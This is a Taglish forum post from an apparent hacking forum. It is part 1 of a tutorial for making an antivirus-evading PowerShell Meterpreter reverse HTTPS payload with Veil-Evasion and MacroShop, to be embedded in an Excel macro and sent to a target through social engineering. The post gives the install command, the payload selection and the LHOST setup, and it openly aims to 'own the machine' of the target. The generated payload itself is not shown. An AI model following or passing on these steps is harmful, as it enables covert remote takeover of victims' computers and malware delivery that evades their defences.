Nicolandia15
Eternal Poster
- Joined
- Jan 12, 2016
- Posts
- 581
- Reaction
- 506
- Points
- 265
Windows 10! Yes it's vulnerable! Sa ngayon. Alam mo yung feeling na magkaroon ka ng root access sa isang machine na wala man lang paki yung nakaupong antivirus or Windows 10 Security sa ginagawa mo. Sort of para sa mga advance user (not a pro here) but newbies can follow.
Exploit: Gagamit tayo ng Excel para mag inject ng Power Shell gamit ang macro. Konting Social Engineering para ma deliver ang payload. Own the machine!
Requirements:
Kali Linux 2
Separate Machine (Preferably Windows 10 na may ibang AV)
Step 1:
I'll be brief sa mga steps. Comment na lang siguro pag may confusion.
Install Veil-Evasion <-- Love this guy. Never fails to amaze me pagdating sa AV Evasion
Code:
apt-get install veil-evasion
Download Git Clone for MacroShop -- [You do not have permission to view the full content of this post. Log in or register now.]
Kailangan naman natin to pang deliver ng payload gamit ang Office Macro
Step 2:
Gumawa na tayo ng payload.
Fire up Kali Linux and type "veil-evasion"
Press "N" for No. Pag nag yes ka may dagdag jan na mga useful tools pero initial installation will work just fine.
Step 3:
- Type "use"
- May list na lalabas, gagamitin natin yung 23) powershell/meterpreter/rev_https
Depende to sa number ng list mo.
- Type "23" (If 22 sa'yo then type 22)
- Type natin yung IP Address mo gamit ang "set LHOST". Kung binabalak mo tong gawin outside LAN then yung Public IP mo gamitin mo.
- Then type "generate"
Step 4:
Pangalanan natin payload natin. Here I put "phcorner"
Step 5:
Next step is copy natin yung ginawa nating Payload File file just like this.
-Press any key daw
- Type Exit para lumabas sa Veil-Evasion
Step 6:
Naalala mo yung MacroShop na dinownload mo? Gagamitin na natin siya ngayon. Depende kung san mo siya sinave. Kailangan mo mag navigate dun gamit ang terminal.
Note: I assume basic understanding po kung pano mag navigate sa Linux. Kasi di ko siya isasama sa Tutorial na to.
- Let's run the Python script tsaka gumawa ng text file.
- Voila! Meron na tayong shell na pwede i embed sating Excel File.
Ganito maging itsura nya.
Step 7:
Mag navigate naman ngayon kung san naaka save yung text file. Actually andun siya sa MacroShop folder. Open up yung file gamit ang leafpad or any text file then copy mo ito. Eto ulit yung naka embed sa macro ng Excel File.
Next tutorial tuloy natin kung pano eto ilalagay sa Excel and kung pano mag setup ng listener gamit ang Metasploit para ma own ang machine ng target mo.
Part 2 is up!
[Click here ]
Last edited: